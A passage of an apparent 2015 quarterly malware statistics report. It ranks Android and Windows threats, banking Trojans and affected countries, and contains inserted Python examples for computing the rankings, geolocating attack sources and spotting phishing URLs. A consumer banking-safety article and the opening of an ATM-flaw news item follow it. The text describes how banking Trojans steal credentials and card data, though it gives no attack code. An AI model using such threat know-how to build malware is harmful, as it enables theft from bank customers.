5 Trojan.AndroidOS.Ztorg.a 5.5
6 Exploit.AndroidOS.Lotoor.be 4.9
7 Trojan-Dropper.AndroidOS.Gorpo.a 3.3
8 Trojan-SMS.AndroidOS.Opfake.a 3.0
9 Trojan.AndroidOS.Guerrilla.a 2.9
10 Trojan-SMS.AndroidOS.FakeInst.fz 2.6
11 Trojan-Ransom.AndroidOS.Small.o 2.3
12 Trojan-Spy.AndroidOS.Agent.el 2.1
13 Trojan.AndroidOS.Ventica.a 1.9
14 Trojan.AndroidOS.Ztorg.b 1.9
15 Trojan.AndroidOS.Ztorg.pac 1.8
16 Trojan.AndroidOS.Fadeb.a 1.6
17 Trojan-SMS.AndroidOS.Smaps.a 1.5
18 Trojan.AndroidOS.Iop.a 1.5
19 Trojan.AndroidOS.Guerrilla.b 1.5
20 Trojan-SMS.AndroidOS.FakeInst.fi 1.4
* Percentage of users attacked by the malware in question, relative to all users attacked.

The top position in the rankings was occupied by DangerousObject.Multi.Generic (46.6%). This is how new malicious applications are detected by the KSN cloud technologies, which help our products to significantly shorten the response time to new and unknown threats. The proportion of DangerousObject.Multi.Generic increased almost three-fold: from 17.5% in Q2 to 46.6% in Q3.

The number of Trojans that use advertising as the main means of monetization significantly increased from the previous quarter. In the second quarter of 2015 this Top 20 included six of these programs, while in Q3 their number increased to 11: three programs belong to the Trojan.AndroidOS.Ztorg family, two to the Trojan.AndroidOS.Guerrilla family, and one each to the Trojan.AndroidOS.Rootnik.d, Trojan-Downloader.AndroidOS.Leech.a, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan-Spy.AndroidOS.Agent.el, Trojan.AndroidOS.Ventica.a and Trojan.AndroidOS.Fadeb.a families.

Unlike the usual advertising modules, these programs do not contain any useful functionality. Their goal is to deliver as many adverts as possible to the recipient using a variety of methods, including the installation of new advertising programs. These Trojans can use superuser privileges to conceal their presence in the system folder, from where they are very difficult to remove.

Of special note is Trojan-Spy.AndroidOS.Agent.el, which is even encountered in the official firmware of some developers.

Trojan-SMS.AndroidOS.Podec.a (7.4%) has been among the Top 3 malicious mobile programs for four quarters in a row due to how actively it is spread. It is worth mentioning that the functionality of the latest versions of this Trojan has changed and no longer includes the sending of text messages. The Trojan is now fully focused on paid subscriptions, making use of CAPTCHA recognition.

Seventeenth place is occupied by Trojan-SMS.AndroidOS.Smaps.a. Some of its versions are able to send spam upon receiving a command from the server via the Viber app if it is installed on the victim’s device. No special permission or actions on the part of the user are required by the Trojan to do this.

The geography of mobile threats

Figure: The geography of mobile malware infection attempts in Q3 2015 (percentage of all users attacked)

Top 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Bangladesh 22.57
2 China 21.45
3 Nigeria 16.01
4 Tanzania 15.77
5 Iran 13.88
6 Malaysia 13.65
7 Algeria 12.73
8 Nepal 12.09
9 Kenya 11.17
10 Indonesia 10.82
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

The most secure countries in this respect are:

Country % of users attacked **
1 Japan 1.13
2 Canada 2.87
3 Denmark 3.20
4 Sweden 3.45
5 Australia 3.48
Although Australia is included in the Top 5 most secure countries, when it comes to mobile malware infections the situation is not as safe as would be expected: in the third quarter of 2015, users in Australia were attacked by mobile banker Trojans more often than users in other countries (see below).

Mobile banker Trojans

In Q3 2015, we detected 2,516 mobile banker Trojans, which is a four-fold increase on the previous quarter.

Figure: Number of mobile banker Trojans detected by Kaspersky Lab’s solutions (Q4 2014 – Q3 2015)

Figure: Geography of mobile banking threats in Q3 2015 (number of users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we made a country ranking according to the percentage of users attacked by mobile banker Trojans.

Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked by mobile bankers**
1 Australia 0.85
2 Republic of Korea 0.40
3 Russia 0.32
4 Cyprus 0.32
5 Czech Republic 0.31
6 Austria 0.27
7 Kyrgyzstan 0.26
8 Bulgaria 0.24
9 Romania 0.23
10 Uzbekistan 0.23
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Australia, which was ranked eighth in the previous quarter, took the lead in Q3 2015. The percentage of users attacked by mobile bankers in Australia increased six-fold (from 0.14% to 0.85%). Such significant growth was caused by fraudsters making active use of Trojan-Banker.AndroidOS.Agent.ad. This Trojan steals credentials used to enter the online banking system of one of Australia’s largest banks. It also tries to steal users’ credit card details (cardholder’s name, card number, CVV, card expiry date).

At the same time, Korea, which topped the Q2 rating, saw its share decrease six-fold (from 2.37% to 0.4%) and dropped to second place in the ranking.

Top 10 countries by the percentage of users attacked by mobile bankers relative to all attacked users

An indication of how popular mobile banker Trojans are with cybercriminals in each country can be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the quarter, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking differs from the one above:

Country* % of users attacked by mobile bankers, relative to all attacked users **
1 Australia 24.31
2 Austria 7.02
3 Montenegro 5.92
4 Republic of Korea 5.69
5 France 5.66
6 Cyprus 5.56
7 Russia 5.09
8 Czech Republic 4.98
9 Sweden 4.81
10 Finland 4.56
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country.

In Australia, which topped the ranking, slightly less than a quarter of all users attacked by mobile malware were targeted by mobile bankers.

The share of bankers among all mobile malware attacks in Russia halved – from 10.35% to 5.09%. This was due to a significant drop in the activity of the Trojan-Banker.AndroidOS.Marcher family which was one of the most popular in the country. In the third quarter the number of attacks using this malware fell almost ten-fold compared to the previous quarter.
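The two mobile-banker rankings above use different denominators, which is why a country can sit first in both with very different percentages. The added example below (not Kaspersky Lab code) recomputes both rankings from constructed per-country telemetry, applying the same 10,000-user cut-off as the report's footnotes; the user counts are invented, chosen only so that the resulting percentages resemble the report's Australia figures.

```python
"""Country rankings for mobile banker Trojans, as in the report's two tables.

Added example, not Kaspersky Lab code. It uses constructed per-country
telemetry (user counts are invented) to show why the two rankings differ:
the first divides banker-attacked users by ALL product users in the
country, the second by users attacked by ANY mobile malware.
Countries with fewer than 10,000 users are excluded, as the report does.
"""
from dataclasses import dataclass

MIN_USERS = 10_000  # threshold stated in the report's table footnotes


@dataclass(frozen=True)
class CountryStats:
    country: str
    users: int            # all mobile security product users in the country
    attacked: int         # unique users attacked by any mobile malware
    banker_attacked: int  # unique users attacked by mobile banker Trojans


# Constructed sample telemetry (not real figures).
SAMPLE = [
    CountryStats("Australia", 200_000, 7_000, 1_700),
    CountryStats("Republic of Korea", 500_000, 35_000, 2_000),
    CountryStats("Russia", 4_000_000, 250_000, 12_800),
    CountryStats("Austria", 100_000, 3_850, 270),
    CountryStats("Montenegro", 12_000, 500, 30),
    CountryStats("Tinyland", 800, 100, 90),   # below threshold: excluded
]


def pct(numerator: int, denominator: int) -> float:
    """Percentage rounded to two decimals, as the report's tables show it."""
    return round(100.0 * numerator / denominator, 2) if denominator else 0.0


def eligible(stats):
    """Apply the report's exclusion rule for small user populations."""
    return [s for s in stats if s.users >= MIN_USERS]


def rank_by_all_users(stats, top_n=10):
    """Ranking 1: % of ALL product users in the country attacked by bankers."""
    rows = [(s.country, pct(s.banker_attacked, s.users)) for s in eligible(stats)]
    return sorted(rows, key=lambda r: (-r[1], r[0]))[:top_n]


def rank_by_attacked_users(stats, top_n=10):
    """Ranking 2: % of users attacked by any mobile malware that met bankers."""
    rows = [(s.country, pct(s.banker_attacked, s.attacked)) for s in eligible(stats)]
    return sorted(rows, key=lambda r: (-r[1], r[0]))[:top_n]


def rank_changes(stats):
    """Map country -> (position in ranking 1, position in ranking 2).

    A country whose position moves between the two has a large share of
    attacked users but a comparatively small overall user base (or the
    reverse); that is the denominator effect the report describes.
    """
    first = {c: i + 1 for i, (c, _) in enumerate(rank_by_all_users(stats))}
    second = {c: i + 1 for i, (c, _) in enumerate(rank_by_attacked_users(stats))}
    return {c: (first[c], second[c]) for c in first}


if __name__ == "__main__":
    for title, table in (("by all users", rank_by_all_users(SAMPLE)),
                         ("by attacked users", rank_by_attacked_users(SAMPLE))):
        print(f"Ranking {title}:")
        for pos, (country, share) in enumerate(table, 1):
            print(f"  {pos:2d} {country:<18} {share:6.2f}%")
    print(rank_changes(SAMPLE))
```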

Vulnerable applications used by cybercriminals

The ranking of vulnerable applications below is based on information about the exploits blocked by our products. These exploits were used by cybercriminals in Internet attacks and in attempts to compromise local applications, including those installed on mobile devices.

Figure: Distribution of exploits used in attacks by type of application attacked, Q3 2015

Compared to Q2 2015, the following changes have taken place:

The proportion of Adobe Flash Player exploits has risen by 2 percentage points (p.p.).
The proportion of Adobe Reader exploits has decreased by 5 p.p.
In Q3, just like the rest of the year, exploits for Adobe Flash Player were in demand. Their share was only 5%, but there are more of them ‘in the wild’ and at the current time nearly all exploit packs are using vulnerabilities in this software. As was the case in the previous quarter, the share of Java exploits (11%) has continued to decrease in Q3. We have not observed any exploits for this software included in recent exploit packs.

In Q3, the most common exploit packs included exploits for the following vulnerabilities:

CVE-2015-5560 (Adobe Flash; this exploit was described in a Kaspersky Lab article)
CVE-2015-2419 (Internet Explorer)
CVE-2015-1671 (Silverlight)
The previous quarter saw a dramatic increase in the number of spam messages containing malicious PDF documents. This quarter, the number of these messages decreased significantly, so the proportion of Adobe Reader exploits also decreased.

The overall trend so far for 2015 has continued in Q3: exploits for Adobe Flash Player and Internet Explorer are most popular with cybercriminals. In the pie chart above, the latter falls into the ‘Browsers’ category; the landing pages from which the exploits spread are also classified here.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

Online threats in the banking sector

These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

In Q3 2015, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 625,669 computers. This number is 17.2 p.p. lower than in Q2 2015 (755,642). A year ago, in Q3 2014, this number was 591,688.

Kaspersky Lab’s solutions produced a total of 5,686,755 notifications about attempted malware infections aimed at stealing money via online access to bank accounts in Q3 2015.

Figure: Number of attacks by financial users, Q3 2015

Geography of attacks

To evaluate and compare the degree of risk of being infected by banking Trojans which user computers are exposed to worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the country.

Figure: Geography of banking malware attacks in Q3 2015 (percent of attacked users)

Top 10 countries by the percentage of attacked users

Country* % attacked users**
1 Austria 4.98
2 Singapore 4.23
3 Turkey 3.04
4 Namibia 2.91
5 New Zealand 2.86
6 Hong Kong 2.81
7 Australia 2.78
8 Lebanon 2.60
9 United Arab Emirates 2.54
10 Switzerland 2.46
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q3 2015, Austria became the leader in terms of the percentage of Kaspersky Lab users who were attacked by banking Trojans. Singapore, last quarter’s leader, is now in second place. It should be noted that most countries in the Top 10 have significant numbers of online banking users, and this attracts the cybercriminals.

In Russia, 0.71% of users encountered a banking Trojan at least once in Q3; this number is little different from the Q2 figure of 0.75%. In the US, the figure was 0.59%, which is 0.3 p.p. lower than in Q2. The countries of Western Europe also saw a small decrease in the percentages of users attacked by banking malware compared to Q2: Spain stood at 1.95%, or 0.07 p.p. less than in Q2; the UK (1.24%) was down 0.34 p.p.; Italy (1.16%) saw a decrease of 0.41 p.p.; while Germany (1.03%) was 0.13 p.p. lower.

The Top 10 banking malware families

The table below shows the Top 10 malware families most commonly used in Q3 2015 to attack online banking users:

Name* Percentage of attacks**
1 Trojan-Downloader.Win32.Upatre 63.13
2 Trojan-Spy.Win32.Zbot 17.86
3 Trojan-Banker.JS.Agent 1.70
4 Trojan-Banker.Win32.ChePro 1.97
5 Backdoor.Win32.Caphaw 1.14
6 Trojan-Banker.Win32.Banbra 1.93
7 Trojan-Banker.AndroidOS.Faketoken 0.90
8 Trojan-Banker.AndroidOS.Agent 0.57
9 Trojan-Banker.Win32.Tinba 1.93
10 Trojan-Banker.AndroidOS.Marcher 0.55
*These statistics are based on the detection verdicts returned by Kaspersky Lab’s products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
**Unique users whose computers have been targeted by the malicious program, as a percentage of all unique users targeted by financial malware attacks.

The majority of the Top 10 malicious programs work by injecting random HTML code in the web page displayed by the browser and intercepting any payment data entered by the user in the original or inserted web forms.

The Trojan-Downloader.Win32.Upatre family of malicious programs remains at the top of the ranking. The malware is no larger than 3.5 KB in size, and is limited to downloading the payload to the victim computer, most typically a banker Trojan from the Dyre/Dyzap/Dyreza family. The first malicious program from this family was detected in June 2014, and its main aim is to steal the user’s payment details. Dyre does this by intercepting the data from a banking session between the victim’s browser and the online banking web app. In the summer of 2015, however, Trojan-Downloader.Win32.Upatre was spotted on compromised home routers, which is a testimony to how cybercriminals make use of this multiple-purpose malware.

Trojan-Spy.Win32.Zbot, in second place, has become a permanent resident of this ranking, and it is no coincidence that it consistently occupies a leading position. The Trojans of the Zbot family were among the first to use web injections to compromise the payment details of online banking users and to modify the contents of banking web pages. They encrypt their configuration files at several levels; the decrypted configuration file is never stored in the memory in its entirety, but is instead loaded in parts. This gives the Trojans of the Trojan-Spy.Win32.Zbot family a technological edge over other malware programs.

Third place in the Q3 ranking was occupied by the Trojan-Banker.JS.Agent family. This is the malicious JavaScript code that results from an injection into an online banking page. The aim of this code is to intercept payment details that the user enters into online banking forms.

Of particular interest is the fact that three families of mobile banking Trojans are present in this ranking: Trojan-Banker.AndroidOS.Faketoken, Trojan-Banker.AndroidOS.Marcher (we wrote about these two in the Q2 report), and a newcomer to this ranking – Trojan-Banker.AndroidOS.Agent. The malicious programs belonging to the latter family steal payment details from Android devices.

The Top 10 operating systems attacked by banker Trojans

In Q3, users of Windows operating systems encountered the largest number of financial malware attacks (which comes as no surprise given how widespread Windows devices are). That said, users of Windows 7 x64 Edition encountered banking Trojans more often, accounting for 42.2% of all banking Trojan attacks. Android also made it into the list of attacked operating systems.

Operating system Percentage of attacks*
Windows 7 x64 Edition 42.2
Windows 7 11.6
Windows 7 Home x64 Edition 5.5
Windows XP Professional 7.0
Windows 8.1 Home x64 Edition 3.7
Windows 8.1 x64 Edition 2.3
Windows 7 Home 1.3
Windows 10 x64 Edition 1.2
Android 4.4.2 0.6
Windows NT 6.3 x64 Edition 0.7
*These percentage numbers are relative to all financial malware attacks detected on the computers of unique users who have consented to provide their statistical data.

It should be noted that although the family of Mac OS X operating systems did not make it to the Top 10, users of this operating system should not see themselves as being immune: in Q3 2015, computers running under Mac OS X were attacked 12,492 times.

TOP 20 malicious objects detected online

In the third quarter of 2015, Kaspersky Lab’s web antivirus detected 38,233,047 unique malicious objects (scripts, exploits, executable files, etc.) and reported 75,408,543 unique URLs as malicious.

Of all malicious or potentially unwanted objects, we identified the 20 most active. These 20 accounted for 95% of all attacks on the Internet.

Top 20 malicious objects detected online

Name* % of all attacks**
1 Malicious URL 53.63
2 AdWare.JS.Agent.bg 16.71
3 AdWare.Script.Generic 7.14
4 Trojan.Script.Generic 6.30
5 Trojan.Script.Iframer 3.15
6 Trojan.Win32.Generic 1.52
7 AdWare.Win32.SoftPulse.heur 1.31
8 AdWare.JS.Agent.bt 1.09
9 AdWare.Win32.OutBrowse.heur 0.84
10 Trojan-Downloader.Win32.Generic 0.63
11 AdWare.NSIS.Vopak.heur 0.46
12 Exploit.Script.Blocker 0.46
13 Trojan-Downloader.JS.Iframe.diq 0.30
14 AdWare.Win32.Amonetize.aqxd 0.30
15 Trojan-Downloader.Win32.Genome.tqbx 0.24
16 AdWare.Win32.Eorezo.abyb 0.23
17 Hoax.HTML.ExtInstall.a 0.19
18 Trojan-Clicker.HTML.Iframe.ev 0.17
19 AdWare.Win32.Amonetize.bgnd 0.15
20 Trojan.Win32.Invader 0.14
* These statistics represent the detection verdicts of the web antivirus module. Information was provided by users of Kaspersky Lab products who consented to share their local statistical data.
** The percentage of all web attacks recorded on the computers of unique users.

The Top 20 is largely made up of verdicts assigned to objects used in drive-by attacks, as well as adware programs. This quarter, adware verdicts occupied nine positions in this ranking.

Of interest is the verdict Hoax.HTML.ExtInstall.a, assigned to a web page which blocks the browser and urges the user to install a Chrome extension. When the user tries to close the page, the voice file ‘voice.mp3’ is often played – “Click on the ‘Add’ button to close this page”.

Figure: Web page urging users to install a Chrome extension (translation: “Press ‘Add’ to continue”)

The extensions that are offered do not cause any harm to users. However, the prompt is very intrusive and it is practically impossible for the user to reject it. This is why Kaspersky Lab products detect the corresponding web page with its popup window as malicious. There is a partnership program that uses this method to distribute the extension.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2015, Kaspersky Lab solutions blocked 235,415,870 attacks launched from web resources located in various countries around the world. 80% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Figure: Distribution of web attack sources by country, Q3 2015

Q3 saw the US take over first place (with 26.9%) from Russia (18.8%). The Virgin Islands and Singapore have fallen out of the Top 10, while there are two newcomers – Sweden (1.43%) and Canada (1.42%).
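The attribution method described above (blocked host, then its IP address, then GeoIP lookup, then share per country) can be reproduced on a small scale. The added example below is not Kaspersky Lab code: the block log, the DNS answers and the GeoIP prefix table are constructed offline stand-ins using documentation address ranges and hypothetical hostnames, so nothing resolves or contacts real infrastructure; it also computes how much of the total the top N source countries cover, the figure the report gives as 80% for its Top 10.

```python
"""Geolocating blocked web-attack sources by country: host -> IP -> GeoIP.

Added example, not Kaspersky Lab code. All inputs are constructed:
hostnames are hypothetical, IPs come from documentation ranges, and the
GeoIP table is a toy. Real GeoIP data carries both coarse and more
specific allocations, so the lookup uses longest-prefix matching.
"""
import ipaddress
from collections import Counter

# Constructed detection log: one blocked web attack per line
# (timestamp, action, key=value fields; verdict names contain no spaces).
BLOCK_LOG = """\
2015-09-01T10:00:01Z blocked host=cdn-exploit.example verdict=Exploit.Script.Blocker
2015-09-01T10:00:05Z blocked host=ads-redirect.example verdict=Trojan.Script.Iframer
2015-09-01T10:01:12Z blocked host=cdn-exploit.example verdict=Exploit.Script.Blocker
2015-09-01T10:02:40Z blocked host=c2-panel.example verdict=Trojan-Downloader.JS.Iframe.diq
2015-09-01T10:03:03Z blocked host=ads-redirect.example verdict=Trojan.Script.Iframer
2015-09-01T10:04:59Z blocked host=unknown-host.example verdict=Hoax.HTML.ExtInstall.a
"""

# Constructed stand-in for DNS resolution, fixed so the example runs offline.
DNS_ANSWERS = {
    "cdn-exploit.example": "192.0.2.10",
    "ads-redirect.example": "198.51.100.7",
    "c2-panel.example": "203.0.113.200",
}

# Constructed GeoIP table: (prefix, country code). The /28 overlaps the /24
# and must win for addresses inside it.
GEOIP = [
    (ipaddress.ip_network("192.0.2.0/24"), "US"),
    (ipaddress.ip_network("192.0.2.0/28"), "CA"),
    (ipaddress.ip_network("198.51.100.0/24"), "RU"),
    (ipaddress.ip_network("203.0.113.0/24"), "NL"),
]


def geolocate(ip: str) -> str:
    """Longest-prefix match of an IP against the GeoIP table ('??' if none)."""
    addr = ipaddress.ip_address(ip)
    matches = [(net.prefixlen, cc) for net, cc in GEOIP if addr in net]
    return max(matches)[1] if matches else "??"


def parse_log(text):
    """Yield (host, verdict) from the constructed log format."""
    for line in text.splitlines():
        fields = dict(f.split("=", 1) for f in line.split()[2:])
        yield fields["host"], fields["verdict"]


def attacks_by_country(log_text, dns=DNS_ANSWERS):
    """Count blocked attacks per source country; unresolvable hosts kept apart."""
    counts = Counter()
    for host, _verdict in parse_log(log_text):
        ip = dns.get(host)
        counts[geolocate(ip) if ip else "unresolved"] += 1
    return counts


def country_shares(counts, top_n=10):
    """Return per-country shares (percent, one decimal) and the share covered
    by the top_n countries, i.e. the report's '80% from 10 countries' figure."""
    total = sum(counts.values())
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    shares = [(cc, round(100.0 * n / total, 1)) for cc, n in ranked]
    top_share = round(sum(s for _, s in shares[:top_n]), 1)
    return shares, top_share


if __name__ == "__main__":
    counts = attacks_by_country(BLOCK_LOG)
    shares, top_share = country_shares(counts, top_n=2)
    for cc, share in shares:
        print(f"{cc:<10} {share:5.1f}%")
    print(f"top 2 countries account for {top_share}% of blocked attacks")
```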

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provide an indication of the aggressiveness of the environment in which computers work in different countries.

Country* % of unique users attacked**
1 Russia 38.20
2 Nepal 36.16
3 Kazakhstan 33.79
4 Ukraine 33.55
5 Syria 32.10
6 Azerbaijan 32.01
7 Belarus 30.68
8 Vietnam 30.26
9 China 27.82
10 Thailand 27.68
11 Armenia 27.65
12 Brazil 26.47
13 Algeria 26.16
14 Turkey 25.13
15 Mongolia 25.10
16 Kyrgyzstan 23.96
17 Macedonia 23.84
18 Lithuania 23.59
19 Bangladesh 23.56
20 Moldavia 23.36
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
**Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

The leader of this ranking remained unchanged – it is still Russia with 38.2%. Since the previous quarter, Georgia, Croatia, Qatar, Bosnia and Herzegovina and Greece have left the Top 20. Newcomers to the ranking are Nepal, which went straight in at number two (36.16%), Brazil in 12th place (26.47%), Turkey in 14th (25.13%), Lithuania in 18th (23.59%), and Bangladesh (23.56%) in 19th.

The countries with the safest online surfing environments included Switzerland (17%), the Czech Republic (16%), the US (16.3%), Singapore (15%), Hungary (13.8%), Norway (13%), Ireland (12.2%), and Sweden (10.8%).

On average, 23.4% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a 0.5 p.p. decrease on Q2.

Local threats

Local infection statistics for users’ computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2015, Kaspersky Lab’s file antivirus modules detected 145,137,553 unique malicious and potentially unwanted objects.

Top 20 malicious objects detected on user computers

Name* % of unique users attacked**
1 DangerousObject.Multi.Generic 19.76
2 Trojan.Win32.Generic 14.51
3 Trojan.WinLNK.StartPage.gena 5.56
4 WebToolbar.JS.Condonit.a 4.98
5 AdWare.Script.Generic 4.97
6 WebToolbar.Win32.Agent.azm 4.48
7 RiskTool.Win32.GlobalUpdate.dx 3.63
8 WebToolbar.JS.AgentBar.e 3.63
9 WebToolbar.JS.CroRi.b 3.32
10 Downloader.Win32.Agent.bxib 3.20
11 AdWare.Win32.OutBrowse.heur 3.13
12 Adware.NSIS.ConvertAd.heur 3.08
13 AdWare.Win32.Generic 3.06
14 Downloader.Win32.MediaGet.elo 2.98
15 Trojan.Win32.AutoRun.gen 2.92
16 AdWare.Win32.BrowseFox.e 2.91
17 WebToolbar.Win32.MyWebSearch.si 2.82
18 AdWare.Win32.MultiPlug.heur 2.66
19 Virus.Win32.Sality.gen 2.61
20 RiskTool.Win32.BackupMyPC.a 2.57
*These statistics are compiled from malware detection verdicts generated by the on-access and on-demand scanner modules on the computers of those users running Kaspersky Lab products who have consented to submit their statistical data.
**The proportion of individual users on whose computers the antivirus module detected these objects as a percentage of all individual users of Kaspersky Lab products on whose computers a file antivirus detection was triggered.

In line with the established practice, this ranking represents the verdicts assigned to adware programs or their components, and to worms distributed on removable drives.

The only virus in the rankings – Virus.Win32.Sality.gen – continues to lose ground. The proportion of user machines infected by this virus has been diminishing for a long time. In Q3 2015, Sality was in 19th place with 2.61%, which is a 0.25 p.p. decrease on Q2.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus had been triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country* % of unique users**
1 Bangladesh 64.44
2 Vietnam 60.20
3 Nepal 60.19
4 Georgia 59.48
5 Somalia 59.33
6 Laos 58.33
7 Russia 57.79
8 Armenia 57.56
9 Afghanistan 56.42
10 Ethiopia 56.34
11 Rwanda 56.21
12 Syria 55.82
13 Mozambique 55.79
14 Yemen 55.17
15 Cambodia 55.12
16 Algeria 55.03
17 Iraq 55.01
18 Kazakhstan 54.83
19 Mongolia 54.65
20 Ukraine 54.19
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

The newcomers to this ranking are Mozambique in 13th position (55.8%), and Yemen in 14th (55.2%).

The safest countries in terms of local infection risks were Sweden (21.4%), Denmark (19.8%) and Japan (18.0%).

An average of 42.2% of computers globally faced at least one local threat during Q3 2015, which is 2.2 p.p. more than in Q2 2015.

Are we putting our finances at risk with our online shopping and banking?
Nearly everyone has faced a cyber criminal’s activity at one point or another. You have probably received a magical SMS that read something like: “You are the winner!!! Your Ferrari and $1M await you! Call XXXXXX right now!!!” Up until now, these well-known tricks have worked surprisingly well. Even if you’ve never taken the bait yourself, you probably know somebody who did.

That person (or you) is not alone. Employees of huge corporations have also been taken by schemes from cyber criminals. For example, over the course of two years the Carbanak cybergang stole funds from dozens of financial institutions worldwide to the tune of roughly $1 Billion. Right now, there is a type of mobile malware targeting mobile banking.

To earn easy money, hackers, for example, make specific malware, which replaces legitimate banking interfaces with custom imagery and code. But before stealing your money, a malware needs to be installed on your device. So how does it find a loophole?

A test recently conducted by Kaspersky Lab shows that many users do not follow basic security rules when making online payments or logging into an online banking system. 50% of the people surveyed do not check whether they are using the authentic website of their bank or payment system. They pay no attention to the https prefix, which indicates an encrypted connection; some of those surveyed even selected a website with a misspelled address, an obvious sign of a fake phishing page.
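The two checks the survey says users skip, an encrypted connection and the exact expected hostname, can be automated. The following is an added example, not code from Kaspersky Lab or the survey; the trusted hostnames and the URLs it is tested with are constructed placeholders.

```python
"""Check whether a payment or banking URL is the genuine site.

Added example (not from the survey); TRUSTED_HOSTS and all URLs are constructed.
"""
from urllib.parse import urlsplit

# Constructed list of legitimate hostnames a user (or a browser extension) trusts.
TRUSTED_HOSTS = {"online.examplebank.test", "pay.examplepay.test"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one- or two-character misspellings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_payment_url(url: str) -> list[str]:
    """Return a list of warnings; an empty list means the URL passes both checks:
    the connection is encrypted (https) and the host is exactly a trusted site."""
    parts = urlsplit(url)
    warnings = []
    if parts.scheme != "https":
        warnings.append("no https: the connection is not encrypted")
    host = (parts.hostname or "").lower().rstrip(".")
    if host in TRUSTED_HOSTS:
        return warnings
    for trusted in TRUSTED_HOSTS:
        # e.g. "online.examplebank.test.attacker.test": the trusted name is only a prefix
        if host.startswith(trusted + "."):
            warnings.append(f"host {host!r} only begins with trusted name {trusted!r}")
            break
        # e.g. "onlime.examplebank.test": a one- or two-character misspelling
        if 0 < edit_distance(host, trusted) <= 2:
            warnings.append(f"host {host!r} looks like a misspelling of {trusted!r}")
            break
    else:
        warnings.append(f"host {host!r} is not a known site")
    return warnings
```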

It seems that a keylogger will also find its victim: only one in five of those surveyed prefers to use a virtual keyboard to protect their passwords from interception by malware. In the survey, other users stated that they choose “incognito” mode to protect a payment, resort to an anonymizer, or even try entering and wiping the data repeatedly in order “to confuse viruses.” Unfortunately, none of these actions does anything to protect a user’s financial information.

What’s more surprising is that 20% of users do not think of protecting their banking accounts even offline. For example, in a restaurant they are ready to hand their bank card to a nice waitress or a polite waiter and let them take it out of their sight.

This is a bad idea. Please remember: if fraudsters get access to your card for even a minute, they can make a full-fledged copy very quickly.

Banks cannot guarantee 100% protection, simply because to a large extent security depends on user behavior. Besides, not all payment systems care that much about cyber security. That’s why users, especially the less cyber-savvy, should install a specific solution to secure their online payments.

For example, one can have a look at the award-winning Safe Money technology for Windows and Mac OS X integrated in Kaspersky Internet Security – Multi-Device and Kaspersky Total Security – Multi-Device. Safe Money enables a multi-layered defense. It checks if the site is secure, ensures you’re not being tricked by a fake page and then opens the website in a special, protected mode.

Flaws in ATMs of a German Bank open the doors to cyber attacks

A security researcher at the Vulnerability Lab discovered that ATMs at the German savings bank Sparkasse can leak sensitive info during software updates.
The security researcher Benjamin Kunz-Mejri, CEO of the Vulnerability Lab, discovered that ATMs at the German savings bank Sparkasse can leak sensitive data during software updates.

